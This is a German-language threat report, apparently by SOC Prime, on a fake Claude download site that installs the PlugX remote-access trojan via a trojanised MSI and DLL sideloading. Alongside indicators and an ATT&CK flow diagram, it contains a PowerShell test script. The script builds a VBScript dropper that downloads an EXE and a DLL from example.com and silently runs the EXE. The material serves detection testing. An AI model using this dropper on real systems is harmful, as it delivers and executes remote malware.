Gefälschte Claude-Seite installiert Malware, die Angreifern Zugriff auf Ihren Computer gewährt

SOC Prime Team

Folgen

Gefälschte Claude-Seite installiert Malware, die Angreifern Zugriff auf Ihren Computer gewährt

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Angreifer richteten eine gefälschte Claude-Download-Seite ein, die ein mit Trojanern versehenes ZIP-Archiv an ahnungslose Benutzer lieferte. Nach dem Öffnen installierte das Archiv einen scheinbar legitimen Claude-Desktop-Client, während es verdeckt den PlugX-Remote-Access-Trojaner durch DLL-Sideloading mit einem signierten G DATA-Updater bereitstellte. Die bösartige Nutzlast wurde im Startup-Ordner des Benutzers platziert, um persistente Verbindungen aufrechtzuerhalten, und initiierte dann ausgehende HTTPS-Kommunikation mit einem Command-and-Control-Server. Die Kampagne zeigt, wie Bedrohungsakteure zunehmend das Interesse an beliebten KI-Tools als Social-Engineering-Köder für den ersten Kompromiss ausnutzen.

Untersuchung

Während der Analyse packten Forscher das ZIP-Archiv aus, identifizierten den MSI-Installationspfad und verfolgten die Ausführung bis zu einem VBScript-Dropper, der NOVUpdate.exe, eine bösartige avk.dll, und eine verschlüsselte Daten-Datei in den Startup-Ordner schrieb. Sandbox-Ausführung bestätigte, dass die geladene Binärdatei erfolgreich gestartet wurde, einen TCP/IP-bezogenen Registrierungsschlüssel veränderte und ausgehende Verbindungen über Port 443 zu einer von Alibaba Cloud gehosteten IP-Adresse initiierte. Diese Ergebnisse bestätigten die Bereitstellung von PlugX durch eine gestufte Infektionskette, die als legitime KI-Software getarnt ist.

Minderung

Benutzer sollten Claude-Software nur von verifizierten offiziellen Quellen herunterladen und die Authentizität der Installationspakete vor der Ausführung überprüfen. Verteidiger sollten Startup-Ordner auf unerwartete Binärdateien oder DLLs überprüfen, insbesondere Dateien, die legitiemen Update-Komponenten ähneln. Firewall- und Endpunkt-Telemetrie sollten ebenfalls auf verdächtigen ausgehenden HTTPS-Verkehr geprüft werden, der mit neu installierten Anwendungen verbunden ist. Das Entfernen der bösartigen Dateien, das Rückgängigmachen nicht autorisierter Registrierungsänderungen und das Durchführen eines vertrauenswürdigen Antimalware-Scans sind entscheidende Schritte zur Eindämmung der Bedrohung.

Antwort

Sicherheitsteams sollten die Anwesenheit von NOVUpdate.exe, avk.dll, oder NOVUpdate.exe.dat im Startup-Verzeichnis erkennen und melden. Weitere Erkennungen sollten sich auf signierte G DATA-Updater-Binärdateien konzentrieren, die nicht vertrauenswürdige DLLs laden und unerwartete ausgehende TLS-Sitzungen zur identifizierten Infrastruktur aufbauen. Betroffene Hosts sollten eine vollständige Bereinigung und forensische Überprüfung durchlaufen, um zu bestätigen, dass keine anderen PlugX-Komponenten, Persistenzmechanismen oder Folgelasten aktiv bleiben.

graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[„Datei – Gefälschte Claude-Website Hostet schädliches ZIP“]:::file node_malicious_zip[„Datei – Schädliches ZIP Enthält trojanisierten MSI-Installer“]:::file node_msi_installer[„Datei – Trojanisierter MSI-Installer“]:::file node_vbscript[„Skript – Claude AI.vbs Kopiert Dateien, startet Claude, setzt Persistenz“]:::script node_novupdate_exe[„Datei – NOVUpdate.exe Legitimer G DATA Updater für DLL-Sideloading“]:::file node_avk_dll[„Datei – avk.dll Bösartige DLL, geladen vom Updater“]:::file node_dat_file[„Datei – NOVUpdate.exe.dat Verschlüsselter Payload“]:::file node_startup_folder[„Datei – Autostart-Ordner Ziel für kopierte Dateien“]:::file node_shortcut[„Datei – Claude AI.lnk Desktop-Verknüpfung, die VBScript ausführt“]:::file node_cleanup_batch[„Datei – cleanup.bat Löscht schädliche Artefakte nach Ausführung“]:::file node_registry_key[„Registry – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters“]:::registry %% Nodes u2013 Techniques node_initial_access[„Technik – T1204.002 Benutzer-Ausführung Opfer lädt ZIP herunter und führt MSI aus“]:::technique node_execution[„Technik – T1059.005 Visual Basic Führt bösartiges VBScript aus“]:::technique node_persistence_startup[„Technik – T1037.005 Autostart-Einträge Kopiert Dateien in den Startup-Ordner“]:::persistence node_persistence_shortcut[„Technik – T1547.009 Verknüpfungsänderung Erstellt und ersetzt Desktop-Verknüpfung“]:::persistence node_appcert_dll[„Technik – T1546.009 AppCert-DLLs DLL-Sideloading über G DATA Updater“]:::evasion node_obfuscation[„Technik – T1027.009 Verschleierte Dateien Verschlüsselter .dat Payload wird zur Laufzeit entschlüsselt“]:::evasion node_registry_mod[„Technik – T1012 Registry-Abfrage Modifiziert TCP/IP-Parameter“]:::registry node_c2_proxy[„Technik – T1090.002 Externer Proxy HTTPS-Ausgang über Proxy“]:::c2 node_c2_web[„Technik – T1102 Web-Service Kommunikation über HTTPS“]:::c2 node_indicator_removal[„Technik – T1070.010 Indikatoren entfernen Batch-Datei löscht Dropper und sich selbst“]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion

Angriffsverlauf

Angriffsbericht & Befehle:
Ein Angreifer erstellt ein bösartiges VBS-Skript, das die Nutzlast herunterlädt NOVUpdate.exe von einem Command-and-Control (C2) Server, speichert es in %TEMP%, und startet es dann über wscript.exe. Das gleiche Skript lädt auch avk.dll vom selben Standort, um DLL-Sideloading zu erreichen. Der Angreifer verlässt sich auf den eingebauten Windows Script Host (WSH), um keine Aufmerksamkeit durch traditionelle AV-Heuristiken zu erregen.
1. Die bösartige VBS-Datei schreiben (malicious.vbs) zu %TEMP%.
2. Aufruf wscript.exe mit dem Pfad zur VBS-Datei.
3. Das VBS-Skript führt ein HTTP GET aus, um NOVUpdate.exe and avk.dllabzurufen, speichert sie auf der Festplatte und führt NOVUpdate.exe.

Regressionstest-Skript:

# --------------------------------------------------------------------
# Simulation des bösartigen Droppers – löst die Sigma-Regel aus
# --------------------------------------------------------------------
$tempDir = "$env:TEMPDropperDemo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Erstellen eines bösartigen VBS, das zwei Dateien herunterlädt und NOVUpdate.exe ausführt
$vbsPath = "$tempDirmalicious.vbs"
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.open "GET", "http://example.com/NOVUpdate.exe", False
objXML.send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
objStream.Close
End If

‚ Download avk.dll (wird für DLL-Sideloading verwendet) objXML.open „GET“, „http://example.com/avk.dll„, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(„ADODB.Stream“) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile „$tempDiravk.dll“, 2 objStream.Close End If

‚ Führen Sie die abgelegte EXE aus CreateObject(„WScript.Shell“).Run „““$tempDirNOVUpdate.exe“““, 0, False „@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Führen Sie das Skript über wscript.exe aus (dies ist die Telemetrie, die wir testen)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONAL: Pause für die Erkennung
Start-Sleep -Seconds 10
# --------------------------------------------------------------------

Bereinigungskommandos:

# Entfernen Sie alle durch die Simulation erstellten Artefakte
$tempDir = "$env:TEMPDropperDemo"
if (Test-Path $tempDir) {
    Remove-Item -Path $tempDir -Recurse -Force
}

# Stellen Sie sicher, dass alle verbleibenden NOVUpdate.exe Prozesse beendet werden
Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten